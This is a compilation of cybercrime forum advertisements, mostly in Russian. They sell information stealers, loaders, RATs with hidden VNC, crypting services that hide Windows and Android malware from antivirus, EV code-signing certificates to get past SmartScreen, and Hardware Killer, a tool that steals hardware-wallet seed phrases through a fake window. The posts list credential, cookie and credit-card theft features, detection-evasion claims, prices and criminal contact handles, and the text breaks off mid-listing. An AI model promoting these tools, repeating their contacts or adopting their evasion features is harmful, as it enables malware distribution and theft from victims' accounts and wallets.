→ Топ 10 стран по логам
→ Топ 10 кошельков
→ Визуализация полученных логов по времени используя чарты
✦ Автоматическое Обновление панели
→ Софт автоматически узнает когда вышло новое обновление и загрузит его
самостоятельно при следующем запуске
✦ Cледить за новостями на главной странице
✦ Сайт, где вы можете
→ Загрузить софт (панель)
→ Смотреть новости связанные с проектом
→ Получить информацию о вашем аккаунте и его активности
✦ Службка поддержки работает 24/7
Spoiler: Админ панель фото
Spoiler: Структура лога
Spoiler: Комментарий Разраба
Даже хороший софт мало чего стоит без постоянной поддержки и сопровождения его автором. Выходят новые версии софта, аверы анализируют малварь, так или иначе, надо постоянно что-то менять, обновлять, доделывать. Обновляются программы, обновляются базы аверов, и софт без поддержки за месяц становится ничем не лучше паблика. Для примера, возьмём Azorult, который был самым популярным стиллером в свое время, но очень быстро загнулся после пропажи автора. Сначала из за большого количества детектов, но окончательно его добил апдейт хрома (80 версия), в котором поменяли алгоритмы шифрования. Поэтому, покупая подписку - это гарантия, что мы будем поддерживать наш проект. Про крипт. Кто-то считает, что крипт это панацея, неважно что малварь палит даже виндеф, можно закриптовать да пойти работать дальше. Это не так. Запомните раз и навсегда - крипт спасает только от детектов в статике, то есть когда файл лежит на диске, или пересылается по почте, скачивается откуда-то. В динамике убирать детекты должен создатель софта и никак иначе. По форумах ходят легенды о чудо-криптовальщиках, якобы убирающих детекты рантайма, но это очередная городская легенда, крипт усложняет анализ малвари (зависит от хитростей криптера) это лучшее что он может сделать.
**
Spoiler: Цены на наш Продукт и Контакты
**Support
PM - данного форума
TOX -
C96EA8DFB780D9053728816F20901315F6284CB73B735559100696FB30B31364CE0AD357E634
Jabber - luciferxfiles@exploit.im
Telegram - https://usrlnk.io/XFiles
Matrix - https://matrix.to/#/@luciferxfiles:matrix.org
Наш Matrix Канал - https://matrix.to/#/#XFILESDevblog:matrix.org
Наш Matrix чат - https://matrix.to/#/#XFilesPublicChat:matrix.org**
♕**Премиум Подписка, все необходимое для работы
Цена - $200 - 1 Месяц.
✔ Саппорт 24/7
✔ Премиум Чат в Matrix для клиентов.
✔ Максимально 20 юзеров в команде.
✔ Windows C++ Нативный Стаб X64
✔ Доступ к методичке.
✔ Восстановление токена Google.
✔ Нерезидентный Loader.
Крипт (Уникальный Стаб)
Обход Дефендера.
****Обход
Смартскрина.
**Обход
Браузерных алертов.
Приватные скрипты.
MacOS Стаб (в разработке)
♕Вор Подписка, для людей, которые осознают свои действия.
Цена - $450- 1 Месяц.
✔ Саппорт 24/7
✔ Премиум Чат в Matrix для клиентов.
✔ Максимально 20 юзеров в команде.
✔ Windows C++ Нативный Стаб X64
✔ Доступ к методичке.
✔ Восстановление токена Google.
✔ Нерезидентный Loader.
✔ Крипт (Уникальный Стаб)
✔ Обход Дефендера.
Обход Смартскрина.
Обход Браузерных алертов.
Приватные скрипты.
MacOS Стаб (в разработке)
♕Профессионал Подписка, для единомышленников - быстрый старт для запуска
вашего трафика!
✔ Саппорт 24/7
✔ Премиум Чат в Matrix для клиентов.
✔ Максимально 20 юзеров в команде.
✔ Windows C++ Нативный Стаб X64
✔ Доступ к методичке.
✔ Восстановление токена Google.
✔ Нерезидентный Loader.
✔ Крипт (Уникальный Стаб)
✔ Обход Дефендера.
✔ Обход Смартскрина.
✔ Обход Браузерных алертов.
✔ Приватные скрипты.
MacOS Стаб (в разработке)
Welcome to our shop! Feel at ease and take your time exploring. I'm here to share my expertise and help with any questions you may have. Our product is specifically designed to effectively disable EDR and AV systems, ensuring top- notch performance. All our solutions have been rigorously tested in real-world scenarios using the best tools available. Should you need any assistance or guidance, please reach out. For your security, we process all transactions through a trusted escrow or guarantor system. We look forward to supporting you on your journey!
Technical information
_Use case_
_License_
_Legal Disclaimer_
The software provided is sold strictly for educational and research purposes only. By purchasing and using this tool, you agree to the following terms and conditions:
- By purchasing and using this software, you acknowledge that you have read, understood, and agree to be bound by these terms and conditions. -
Spoiler: FAQ
Can I execute X product after executing the tool?
- Yes, the only requirement is to have administrator privileges. If the
software is executed correctly, you will be able to deploy any software you
like.
Could you please conduct a test for me?
- No, this product does not come with a trial version. The service works as
demonstrated.
Do you have Telegram?
- No, we do not use Telegram. Please contact us directly via DM.
Do you have tox/jabber, etc?
- No, we do not. The only way to contact us is via direct message on the
forum.
Asgard Crypt Service
Телеграм бот для крипта ваших файлов
Основные особенности:
Поддержка x32/x64/.NET (любые версии), EXE
Код каждого файла при выдаче максимально уникализируется (по максимуму уменьшаем вероятность детекта от другого сделанного крипта)
Без зависимостей. Крипт работает на любых системах
Множество дополнительных функций
Еженедельные рассылки с актуальным рантаймом. Делаем всегда с включенным интернетом
Avcheck скан выдается вместе с файлом
Гарантировано не больше 2 детектов по скану (если 3 то файл отдается бесплатно)
Перед криптом можно увидеть скан последнего сделанного файла
Стаб добавляет порядка 800-900кб весу
Крипт только ехе файлов. Отправлять можно чистым ехе или архивом (с паролем или без)
Высокая скорость работы. Один файл в среднем делается около минуты-двух
Своевременные чистки. Как только любому из клиентов выдался файл с детектом, бот оповещает разработчика
Важно
Криптуем только файлы без автозагрузки и прописывания себя в систему, это все
можно добавить в процессе крипта
Информация по требованиям к файлу, правила сервиса, а так же более детальную
информацию про все можно прочитать в самом боте.
Стоимость : 45$ за крипт (будем постепенно поднимать по мере появления
клиентов, дабы не вредить стабу)
Пополнение баланса в боте, **BTC, USDT TRC20, ETH
Контакты**
Бот: https://t.me/asgard_protector_bot
Всегда поможет и ответит на все вопросы саппорт :
TG: https://t.me/asgard_bot_support
TOX:
34664693C0D90301209F79239D0DE34F1609349C02DEAC94F82D768A9228263BCA80539FB9A7
Spoiler: FAQ
Q: Я пополнил баланс, как мне начать работу?
A: Можете сразу отправлять файл. Поддерживаемый формат файла только .ехе! Сам
ехе файл можно отправить тремя способами:
Q: Я хочу сделать сразу несколько файлов, это возможно?
A: Да, для этого необходимо отправить все .ехе файлы в одном архиве. На
выходе получите один файл, при запуске которого отработают все файлы что вы
отправили !ВАЖНО! С баланса спишется ровно столько протектов, сколько вы
отправили .ехе файлов в архиве
Q: Как узнать подходит ли мой файл для крипта в боте?
A: Бот занимается криптом следующих типов файлов: x64/x86, Native/.NET Однако
есть некоторые требования:
Q: Я не знаю подходит ли мой файл под требования. Что делать?
A: Обратитесь к саппорту. Саппорт поможет вам проверить файл на совместимость
и скажет точно, можно ли закриптовать такой файл
Q: Какие дополнительные функции мне нужно включить?
A: Если вы не знаете какие конкретно функции вам нужны, то лучше никакие доп
функции не трогать
Q: Сканнер на крипте показал что детекта нет, но я проверил на своем ПК и
детект на этом антивирусе есть. Будет замена?
A: К сожалению нет, в данных случаях возврат/замена не предусмотрены, бот в
своей работе ориентируется только на показания сканера и гарантия на детект
только по нему. Об этом написано в правилах сервиса
Spoiler: ENG
Asgard Crypt Service
Telegram bot for crypting your files
Key Features:
x32/x64/.NET support (any version)
The code of each crypt is as uniqueize as possible (we minimize the possibility of detection from another crypt)
No dependencies. Crypt works on any system
Lots of additional features
Weekly newsletters with current runtime detections. We always do this with the Internet on
Avcheck scan is giving along with the crypt
Guaranteed no more than 2 detections per scan
You can see a scan of the last file made
Stub adds about 800-900kb to the size
Ability to crypt several files into one at once
Crypt only exe files. You can send as a pure EXE or as an archive (with or without a password)
High speed. On average, one file takes about a minute or two to complete.
Timely cleaning stub. As soon as a file with a detection is issued from the bot, bot notifies the developer
Important
We crypt only files without startup and registering yourself in the system,
all this can be added to the crypt process
Information on the requirements for the file, as well as more detailed
information about everything, can be read in the bot itself
Price
$45 per crypt (we will increase the price as soon as the number of clients
increases)
Top up your balance in the bot, BTC , **USDT TRC20, ETH
Contacts**
Bot: https://t.me/asgard_protector_bot
Support will always help and answer all questions:
TG: https://t.me/asgard_bot_support
TOX:
34664693C0D90301209F79239D0DE34F1609349C02DEAC94F82D768A9228263BCA80539FB9A7
Spoiler: FAQ
Q: I have topped up my balance, how can I get started?
A: You can send the file immediately. The supported file format is only .exe!
The EXE file itself can be sent in three ways:
Q: I want to make several files at once, is this possible?
A: Yes, for this you need to send all .exe files in one archive. As a result,
you will receive one file, which, when launched, will process all the files
that you sent! IMPORTANT! Exactly as many crypts will be debited from the
balance as you sent .exe files in the archive
Q: How do I know if my file is suitable for crypt in the bot?
A: The bot deals with the crypt of the following file types: x64/x86,
Native/.NET However, there are some requirements:
Q: I don't know if my file meets the requirements. What to do?
A: Contact support. Support will help you check the file for compatibility and
tell you exactly whether such a file can be crypted
Q: The scanner in the bot showed that there is no detection on crypt, but I
checked on my PC and there is a detection on this antivirus. Will there be a
replacement?
A: Unfortunately, no, in these cases, returns/replacements are not provided,
the bot in its work is guided only by the readings of the scanner and the
guarantee for detection is based only on it. This is written in the service
rules
#------------------------------------------------------#
#------------------------------------------------------#
Решение для защиты (кода) ваших проектов от ручного и динамического анализа,
копирования алгоритмов, бинарного сравнивания, усложнения реверсинга, взлома
лицензий, генерации уникальных сборок бинарных файлов и т.д.
**Решение именно обфусцирует код, а не просто генерит треш код вокруг
полезного кода.
**
You must have at least 20 message(s) to view the content.
Условия:
Стоимость 0.25 BTC
В стоимость входит годовая поддержка решения и обновления, багфиксы.
Решение накрыто протом, защита от копирования, исходный код не входит в
поставку.
Решение поставляется в виде CLI инструмента.
В сделку входит передача морфера, помощь в установке, поддержка проекта в
течении года.
В проект вшит индивидуальный токен, привязанный к профилю покупателя.
Покупатель приобретает продукт морфера в личных целях и обязуется не
распространять в паблик и не передавать
третьим лицам морфер и другие части проекта, а так же обязуется не оказывать
услуг по морфингу чужих проектов на любой основе.
**Не русскоязычных просьба не беспокоить, сделки не будет.
Сделка осуществляется исключительно через гаранта, автогарант форума.
Первый контакт, верификация ч\з пм.**
You must have at least 25 message(s) to view the content.
Подробности, примеры морфинга при личном общении.
Spoiler: Тема закрыта из-за арбитража на Эксплойте
Licensed Cobalt Strike 4.9 & Cobalt Strike 4.9.1. Original hash. Latest Arsenal kit - all kits. Lifetime option available (tool guaranteed cannot be blocked).
Note: Don't buy from scum where license will get blocked in a month or so and you won't be able to use anymore (https://forum.exploit.in/topic/190935/ - something like that). Don't use for anything serious the "leaked" shit which is just some garbage combination of old files and trash - fake hash, fake files (size only of one original file exceeds the whole trash "leak").
Contact with PM.
Introducing Ailurophile Stealer – The Ultimate FUD Tool for Everyday Use
Looking for a powerful and discreet way to collect sensitive information?
Tired of renting servers/hosting or setting up complicated systems to collect logs? Now, with just one click , you can generate a stub to send to your target, and we 'll handle the rest !
Look no further than Ailurophile Stealer , your go-to solution for staying fully undetected (FUD) every day.
Key Features:
**Whether you 're experienced or just starting, Ailurophile Stealer gives you everything you need while staying under the radar!**
Contact Us
Website : Ailurophilestealer.com
Telegram : @Ailurophilevn
JID : ailurophile@exploit.im
Message us for more details or to get started today!
We are looking for partners who have the ability to spam and distribute our stealer. Logs will be shared equally (50/50).
**Pricing Plans:
Standard Package**
Only one stub may be generated per day.
Limit of 50 bots. If there are more than 50 bots, the newest bots will be
stored and the oldest bots will be deleted.
Stub options:
Stub version 1.x
Telegram notify
Pricing
$80/month
$400/6 months
$1280/Lifetime
Premium Package
05 stubs may be generated per day.
Limit of 200 bots. If there are more than 200 bots, the newest bots will be
stored and the oldest bots will be deleted.
Stub options:
Stub version 1.x
Telegram notify
Disable Windows Defender
Delivery other stealer or RAT
Pricing
$140/month
$700/6 months
$2240/Lifetime
VIP Package
20 stubs may be generated per day.
Unlimited bots.
Stub options:
Stub version 1.x
Stub version 2.x
Assembly information
Telegram notify
Mix stub
Pump file
Startup
Disable Windows Defender
Delivery other stealer or RAT
Pricing
$250/month
$1250/6 months
$4000/Lifetime
**Stub Features:
Stub version 1.x**
Stub options:
- Bypass 99% AV
- Disable Windows Defender
- Deliver other RAT or Stealer
- Grabber file
- Stolen password
- Stolen cookies
- Stolen history
- Stolen credit card
- Telegram notify
- Stolen all Chromium-based browser data
- Obfuscated and Encrypted
Stub version 2.x
Stub options:
- Anti-VM
- Bypass 100% AV
- Disable Windows Defender
- Deliver other RAT or Stealer
- Grabber file
- Stolen password
- Stolen cookies
- Stolen history
- Stolen credit card
- Telegram notify
- Stolen all Chromium-based browser data
- Stolen all Gecko-based browser data
- Run silently
- Startup
- Obfuscated and Encrypted
Spoiler: Stealer
Check Ver 1.x:
![kleenscan.com](/proxy.php?image=https%3A%2F%2Fkleenscan.com%2Fimages%2Flogo- mini.png&hash=f0087456dc8cef90f219c8e9607b4c84&return_error=1)
](https://kleenscan.com/scan_result/bc63f3376fdec615914cd3d09f0649e674e95d9a9278316be298f5451f181a79)
Analyze files to detect malware. Analyze URLs, domains, and IPs to detect malware and blacklist status.
kleenscan.com
Check ver 2.x
![avcheck.net](/proxy.php?image=https%3A%2F%2Favcheck.net%2Fimg%2Flogo- blue.png&hash=cee6508989b328cffbfe9596440db6c7&return_error=1) avcheck.net
APK FUD/CRYPTING SERVICE
I'm Providing FUD/CRYPT Service for any APK including any ANDROID BOTNET/any ANDROID RAT, any ANDROID BANKBOT including Private and Public Bots.
My crypt works good and smooth with any Public or Private Android Botnet/Bank Bots, Alien , Cerberus, Hydra, Chimera, Spynote, Spymax, Mobihok, 888Android, Metasploit apk and Android RATS or Any APK.
HERE IS THE PRICE LIST:
1. 30$ for 1CRYPT APK
2. 85$ 2 CRYPT APK PER DAY FOR 3 DAYS
3. 140$ 10CRYPT APK PERDAY FOR 1 WEEK
4. 225$ 20 CRYPT APK PER DAY FOR 1 WEEK
5. 270$ 25 CRYPT APK PER DAY FOR 1 WEEK
6. 440$ 50 CRYPT APK PER DAY FOR 1 WEEK
(Custom Plans are also available as per users/clients Requirement also in daily/weekly/monthly service also)
Contact me :
Jabber: hiddenroot@exploit.im
OR
Send me message here itself(PM)
NOTE: THIS IS ONLY MY TELEGRAM CHANNEL AND ACCOUNT. I DONT HAVE ANY OTHER
TELEGRAM CHANNEL/ACCOUNT BEWARE OF THE SCAMMERS
_Here are the Scan Result of my crypts:
Anubis:_
dyncheck.com
Hydra:
dyncheck.com
Alien:
dyncheck.com
Artemis:
dyncheck.com
language: Golang
Platforms: Linux, Windows
Price:
$300 per build
What you will receive:
- agent build
- vnc build
- server binary (I will help with server configuration)
Info:
- all communication is encrypted over secure web-sockets and HTTPS.
- CIS Geo block
- Windows built as DLL or EXE
- Interactive web interface to manage agents,logs,networks
- Built in file server.
- active output from agent commands
- run commands as job for long running tasks
- Support for both Windows and Linux
- Server and payloads are programmed in Golang with Postgres backend and
vuejs frontend.
- builtin commands for common actions
- Back connect port forward
- upload and download
- automatically enumerate browser profiles.
- main agent and HVNC are separate payloads.
- hvnc
- vnc
Scans
NEW TELEGRAM:**
**
**EV CODE SIGNING -KILL SMARTSCREEN,****CLOUD (NO MALWARE SCAN)**FOR
1 YEAR -AVAILABLENOW
Price: 2.000$
OV CODE SIGNING IN CLOUD:
PRICE:~~400$~~ 350$
IN MY SERVICE:
------
Always ready for Escrow!
jabber: elcastro@jabb3r.de (If you want to chat
via jabber please send request PM, due the high spam)
Telegram: https://t.me/elcastroservice
qTox:
155DBA58EA73BD4F4664D6C9E910706AC4520DCC23CC6C55BA248F47CCC0193C195782300C11
Уважаемый Клиент.
Здесь будут описаны достоинства, правила использования приватного лоадера,
который вы арендуете.
Название продукта: AresLoader.
Месячная аренда обойдётся в 300$. Никаких скидок не предусмотрено. В стоимость
включены: 5 rebuild ( включая первый ), каждый с частичной чисткой стаба (
уникализация сигнатуры бинарника ). Любой последующий rebuild будет стоить
50$, это может занять некоторое время, т.к. данная услуга оказывается
исключительно вручную, но долго ждать мы не заставим.
Помимо этого, ручной морфинг кода ( для каждого build он свой ).
После приобретении лицензии админ создаёт пользователя в нашей системе:
Загружает ваши файлы в панель ( легитный и полезную нагрузку ) и даёт доступ в
панель что бы вы могли видеть отстук лоадера:
=================================
Принцип работы AresLoader заключается в том, что он выдаёт себя как легитимное
ПО ( не обязательная функция ) и следом подгружает полезную нагрузку, которую
прячет на диске в любое удобное для вас место. Перед запуском полезной
нагрузки, Ares запускает легитный файл.
AresLoader может запрашивать admin права у Пользователя ( пока не разрешит ) от имени cmd.exe и в последствии передать права с cmd.exe на полезную нагрузку.
Ares поддерживает возможность подгрузки зашифрованной полезной нагрузки шифрами AES/RSA ( используем только свой шифратор во избежания проблем с расшифровкой ) ( beta )
Для уточнения конкретики, связанной с работой и функционала лоадера — свяжитесь с командой, мы готовы ответить на любой вопрос. Т.к. билдер идёт в виде конструктора, они могут возникнуть.
Так же, в связи с тем, что лоадер будет совершенствоваться, будут вводиться различные обновления они могут быть как платными, так и бесплатными. В любом случае мы Вас оповестим о грядущих нововведениях, объясним что и где будет обновлено/модернизировано.
=================================
ДЕТЕКТЫ АВ:
Kleen Scan -
https://www.kleenscan.com/scan_resu...f1f8304a0d29aedd2590b0bb064fa7d54f07dad3da9e5
( 0 / 40 )
Avcheck - https://avcheck.net/id/WCpgNUoc0iL6 ( 0 / 26 )
Предусмотрены правила использования. К попытке изменения или их нарушения относимся критично, вплоть до блокировки пользователя.
1. Перепродажа лицензии ЗАПРЕЩЕНА.
2. Мы не несём ответственность за любые потери арендатора.
4. Запрещено выкладывать бинарный файл лоадера в общий доступ.
5. Запрещено заливать лоадер на Virus Total.
СВОБОДНЫХ МЕСТ: 7 из 10.
ВСЕ СДЕЛКИ ПРОВОДИМ ЧЕРЕЗ ГАРАНТА ФОРУМА.
Со своей стороны команда Разработчиков готова обеспечить комфортное использование нашего продукта. В скором времени будут доработаны обновления и прочие дополнения функционала для улучшения работы, увеличения потенциала использования Нашего AresLoader. При каких-либо вопросах готовы выйти на связь в удобное время и решить возникшие проблемы. Ищем долгосрочное сотрудничество и добросовестных Клиентов.
С Уважением, команда AresLoader
Приветствую читателей данного топика хочу продемонстрировать вам продукт Hardware Killer
Spoiler: Информация о продукте
Сам билд Hardware Killer написан на C# .Net Framework 4.7.2
Панель написана на C# .Net 6.0
Суть заключается в скрытой работе и краже сид-фразы от аппаратных кошельков, путем мгновенной подмены оригинального окна на фиш
Сам функционал билда имеет следующие фишки
Самоуничтожение
Анти-СНГ
Тихая работа, которая абсолютно не нагружает систему
Реалистичный сценарий кражи сид-фразы
Валидация полей, пока юзер не введет 24 фразы из словаря bip39, он не сможет
отправить сид-фразу
Автозагрузка выставляется при желание
Скоростная подмена, которую юзер не сможет заметить, и что либо заподозрить
Реализовано ожидание подключение аппаратного кошелька, то есть юзер подключает
и переключается на следующее окно уже с вводом сид-фразы
Функционал панели
Статистика запусков в формате
LOG:IP:COUNTRYIME
Статистика событий когда было запущено в формате TIME:EVENT
Отправка сид-фраз с панели в телеграм (текстовым сообщениме)
Очень стильная и интуитивно удобная панель (скорее как фишка)
Spoiler: Что вы получаете при покупке данного продукта
Техническую поддержку продукта и помощь в установке бесплатно
Чистка стаба раз в неделю на протяжение месяца (дальше обсуждаемо)
Исходники проекта (Билд + панель)
Spoiler: Hardware Killer [Ledger] 1 окно
Spoiler: Hardware Killer [Ledger] 2 окно
Скрины других аппаратных кошельков запрашивайте в лесе
Spoiler: Скрин панели
Цена за данный продукт 1699$.
С радостью поработаю через гаранта.
Если у вас есть вопросы задавайте в личку.
Dear Forum Members,
We are thrilled to introduce you to one of the most exclusive and superior
services in the market today.
Our focus is to ensure the security and protection of Android-based
applications, providing services that shield your APK files from any threats
and attacks.
Our services are of unmatched quality, capable of effortlessly neutralizing
all antivirus software, including popular security measures such as Avast,
Google Protect, and Nod32.
We also offer extensive capabilities to bypass all phone protections, disable
Xiaomi's security measures, and overcome security layers from Google Play
Protect and Vevo.
We protect your APK from reverse engineering attempts and obfuscate your code
to prevent potential leaks.
We provide private encryption for your botnets and private signing features,
ensuring you stay in control.
All these services are offered with an emphasis on superior quality and long-
term durability.
We are pleased to report that our APK has not been detected even 3 months
after our last tests.
This is indicative of its capability to bypass antiviruses and its longevity.
We guarantee customer satisfaction. This service is fully undetectable (FUD),
ensuring a higher level of security and robustness against detection
mechanisms.
To learn more about our services or to place an order, feel free to get in
touch with us. We are committed to offering the highest quality of service and
look forward to serving you.
Best Regards.
[Antivirus Bypass]
Bypass All AV - With an unmatched quality, you can effortlessly neutralize
all antivirus software.
🛡 Bypass Avast App Security - Bypass Avast security measures with ease.
Bypass Google Protect - Even disable Google 's own protection, leaving no
barrier between you and your goals.
🛡 Bypass Nod32 Security - Also easily overcome Nod32 protection.
[Device Security Bypass]
Bypass All Phones Protection - Bypass all phone protections, remove
limitations.
Bypass Device Security - Easily circumvent device security measures.
Bypass Xiaomi Security - Disable Xiaomi 's security measures.
[App Security Bypass]
Bypass Play Protect - Easily overcome Google Play Protect measures.
Bypass Vevo Security -Disable Vevo 's security layer.
[Code Management]
Code Obfuscation - Complexify your code and prevent potential leaks.
Change Pkgname - Change your package name whenever you want, gain more
flexibility.
[Encryption and Signing]
Private Encryption for All Botnets - Provide private encryption for your
botnets, stay safe.
Private Signing - With private signing feature, always stay in control.
[Protection]
🛡 Protect APK from Reverse Engineering - Protect your APK against reverse engineering attempts.
[General]
⏱ Runtime & Scantime - Perfect solution for efficient runtime and scan time.
Support All Version Android - Supports all versions of Android, no need to
worry about compatibility.
All of these are provided in an unprecedented quality and show long-term durability. We are pleased to report that the APK has still not been detected after 3 months since our last tests. This is indicative of its ability to bypass antiviruses and its long-lasting nature. We guarantee customer satisfaction.
--------------------------------------------------
~~Weekly Package (7 Days)~~~~- 350€ [REMOVED]
This package includes the application of all features to 2 APKs per day for a
week.
Daily Package - 100€ [REMOVED]
This package includes the application of all features to 4 APKs for a single
day.~~
Single APK Service - 50€ [ACTIVE]
This service includes the application of all features to a single APK.
Please note, the APKs to be processed should not be obfuscated.
Telegram:APKFUD2023
__
Octo 2 release date - 20. August 2024
Contact Telegram @octo_sup to rent Octo and join private channel.
Access to our account @octobot_support is lost. Delete and block it to avoid any scam attempts.
Spoiler: Закрыто на депозит. Closed for deposit. 500$
Цена :
- Can also convert EXE to DLL upon request
Private stubs along with console builder:
Контакты :
Tele : https://t.me/Kotik17_Crypt
Tox :
9F1868CC43A583D14495CEAEAF14B28B1F8C85A21F2F1B6DB13E041A98296520AEAF9167498D
Side load method (EXE + DLL) method exist , only serious customers, bypasses smartscreen + ZIP and no password needed. Contact to talk, private stubs + files never used for spread (real certificates like adobe, cisco, etc.. all is available for your own usage) - good for live traffic. No time wasters please.
Guarantee:
Notes :
Malware supported:
Enough talks, scans:
EDR:
AV:
Good day.
FEATURES OF ANONVNC MULTITASK RAT + LOADER:
Features Review:
Test File on Real Device: View Demo
Browser Bypass:
* Chrome: [View Demo](https://s12.gifyu.com/images/S5qTV.gif)
* Edge: [View Demo](https://s12.gifyu.com/images/S5qTo.gif)
* FireFox: [View Demo](https://s12.gifyu.com/images/S5qTJ.gif)
Examples of Custom User Interface:
* PDF Skin: [View Demo](https://s12.gifyu.com/images/S5q3X.gif)
* MP3 Skin: [View Demo](https://s12.gifyu.com/images/S5q9M.gif)
EV Code Sign:
* VALID: [View Demo](https://s12.gifyu.com/images/S5q9K.gif)
Windows Defender Bypass:
* [View Demo](https://s12.gifyu.com/images/S5q9w.gif)
Scan: "Run Time" ((AFTER 3 MONTHS OF SPREADING THESE FILES))
Pricing Plan:
For deals via Escrow or contact us directly on Telegram: @Anonvncadmin
**Старейший сервис по продаже цифровых подписей
(сертификатов)
Топик на Экспе с 2016 года
**(/topic/98301/)
Spoiler: тыц
Disclaimer
1. Я не продаю "облачные" сертификаты, требующие доступа к файлам от
центра сертификации (SSL.com eSigner и подобные), и не рекомендую их
использовать по понятным причинам. Privacy is safety.
2. Разовых подписей НЕТ! А вы бы стали подписывать свой софт
сертификатом, который кто-то уже использовал и, возможно, спалил?
3. Я продаю сертификаты только тех центров сертификации, которые присутствуют
в Microsoft Trusted Root Program (<https://ccadb-
public.secure.force.com/microsoft/IncludedCACertificateReportForMSFT>). Все
остальные сертификаты являются по сути скамом.
Варианты покупки
- купить сертификат из наличия, цена $3999 (Globalsign, SSL.com, Entrust -
все серты установлены на токены, не облачные) - гарант приветствуется.
- купить сертификат по предзаказу: срок изготовления 7-8 дней, цена
$3499. Полная предоплата.
- скидки за единовременный заказ нескольких сертификатов обсуждаются
индивидуально
Как пользоваться?
- использовать бесплатный удаленный доступ к токену с установленным
сертификатом (Virtual USB)
- установить сертификат на Ваш собственный токен (eToken, Yubikey)
- получить физический токен на руки в России, а также в некоторых странах
Европы и Азии (уточняйте)
FAQ
- токен - это специальная флэшка, на которой хранится EV сертификат
- срок действия сертификата - 1 год. Под заказ можно сделать на 2 года.
- сертификаты на имя Microsoft, Apple, Google и так далее сделать нельзя.
- сертификат может быть отозван, если удостоверяющий центр получит достаточно
много жалоб на неправомерное использование сертификата.
- срок жизни сертификата напрямую зависит от методов использования: к
примеру, подписывать некриптованную паблик малварь настоятельно НЕ
рекомендуется.
- гарантий на время жизни сертификата нет , поскольку нет возможности
контролировать то, как он используется.
ПреимуществаEV Code Signingсертификатов
- моментальный обход фильтра SmartScreen , не требующий набора репутации
- значительно более высокое доверие со стороны антивирусов, по сравнению с
обычным (OV) сертификатом и софтом без подписи
- подписанный софт вызывает большее доверие у пользователя, что существенно
повышает **конверсию
Контакты:
Tox:**
86251A56955584AB6FAA90034FD0817E5B7A8527D7A8B93DD4F62B5509B699713E8E149F4937
TG : Codesigning (https://t.me/codesigning
- скопируйте ссылку, чтобы не добавить риппера)
Внимательно проверяйте контакты, кидалы не дремлют! Пользуйтесь
верификацией через ПМ!
Spoiler: English version
Disclaimer:
- I do not sell 'cloud certificates' which require sharing your files
with Certificate Authority, like SSL.com eSigner!
- There is no one-time signing available. I find it highly unethical to
sell shared or used certs. All my certs are fresh and never used.
- I only sell EV certs from Cerificate Authorities which are currently
present in **Microsoft Trusted Root Program (<https://ccadb-
public.secure.force.com/microsoft/IncludedCACertificateReportForMSFT>). **All
others are useless and should be considered as scam.
Purchase options
- certificate with instant delivery: $3999(Globalsign, SSL.com, Entrust).
Escrow accepted.
- pre-ordered certs: 4-7 days, $3499, full payment upfront
- discounts on bulk orders
Delivery options
- free and secure remote access to your certificate (Virtual USB)
- you can use your own hardware token to install the certificate
- courier delivery is available for some countries in EU and Asia
Benefits of EV Code Signing certificates
- get rid of SmartScreen blue alerts immediately
- maximum level of trust by antiviruses
- EV certificate is 'must have' if you plan to sign drivers for Windows
10+ (MS Dev Portal account is required).
- signed software is much more trusted by **users
FAQ**
- certs are valid for 1 year. 2 years certs are made by request.
- it's impossible to make certificates for Google Inc., Apple, Microsoft etc.
- certificate may be revoked if Certificate Authority receives many reports
of misuse, e.g. signed malware
- signature is NOT a substitute for crypting your files.
Contacts
Tox:
86251A56955584AB6FAA90034FD0817E5B7A8527D7A8B93DD4F62B5509B699713E8E149F4937
TG : @codesigning (https://t.me/codesigning
- copy and paste)
Double-check contact details before sending money! Verify via PM here!
Beware of scammers!
Услуги крипта EXE файлов. Стоимость паб стаб 69,90$. приват 150$
- Поддержка файлов типа х86 и х64 x32
- Любые типы вредоносных и не очень файлов.
- Поддержка .net и native файлов.
- Бесплатный рекрипт в случае не работоспособности файла по вине криптора.
- Дополнительные услуги в виде: склейка, иконка, описание файла, памп файла,
автозапуск .
- Любые типы вредоносных и не очень файлов.
- Гарантированный обход Windows Defender
- Установка иконки \ подписи - бесплатно
- Увеличить размер файла в многократном размере FREE
- Так же криптуем любые miner , stealer , rat
- При необходимости могу проверить ваш файл после крипта !
- Временно могу криптовать за отзыв !
- Работаю и Криптую 24/7, пишите в любое время.
- Использую так же ручной метод шифрования
- Вы можете оплатить только после того как вы проверите файл на
работоспособность!
-Эксплойты
Реализация с помощью самописного софта
Получаем на выходе при распаковке архива: (желаемый вами расширение файла)
Склейка любых файлов с .exe = (на любой формат которые предоставлен с низу)
Могу сделать чтобы AV и WinDef/Chrome не детектился
Самописный full софт
Склейка+крипт убирает практически все детекты!
Делаю склейку специально под ваш траф!
Services crypto EXE files. Pub stub cost $69.90. private $150.
- Support for x86 and x64 x32 file types
- All types of malicious and not so malicious files.
- Support for .net and native files.
- Free recript in case of broken file due to cryptor's fault.
- Additional services as: glue, icon, file description, pamp file, autorun.
- Any type of malicious and not so malicious files.
- Guaranteed bypass of Windows Defender
- Icon \signature installation - free
- Increase the size of the file to multiple sizes FREE.
- Also crypt any miner , stealer , rat
- If necessary I can check your file after the crypt !
- I can crypt for a feedback temporarily !
- I work and crypto 24/7, write at any time.
- I also use the manual encryption method
- You can pay only after you check the file for operability!
Eploits :
Implementation using self-written software
We get the output when unpacking the archive: (the file extension you want)
Gluing any files with .exe = (to any format that is provided from the bottom)
I can make AV and WinDef/Chrome not detected
Self-written full software
Gluing +crypts removes almost all detections!
На данный момент доступно 3 бесплатных крипты за отзыв 0/3
Все, что вам нужно сделать, это написать мне и сообщить, что вы с форума
эксплойта. У меня также есть темы с большим количеством отзывов на
дружественных форумах!
There are currently 3 free crypts available per REVIEW 0/3
All you have to do is write to me and tell me that you are from the exploit
forum. I also have topics with a lot of reviews on friendly forums!
Уважаемый клиент, здесь описаны функционал, логика работы и правила использования приватного лоадера - Manticora Loader.
Название продукта: Manticora Loader
ФУНКЦИОНАЛ:
Сам лоадер написан на языке Си (15-20кб).
Совместим с версиями от Windows 7 и выше, Windows Server в том числе.
Имеет отдельный модуль для сбора информации о заражённом устройстве. Информация получаемая в панель: IP, USERNAME, LANGUAGE, ANTIVIRUS, UUID (у каждого стука свой uuid), DATETIME.
Имеется возможность поставить ваши файлы в автозагрузку ( по желанию ).
Благодаря модулям имеется возможность лёгкого дополнения по функционалу (обращаться к администратору).
СС лёгок в развёртывании, после оплаты аренды получаете инструкцию по установке в комплекте.
Все данные в билде лоадера обфусцированны от лишних глаз.
ЛОГИКА:
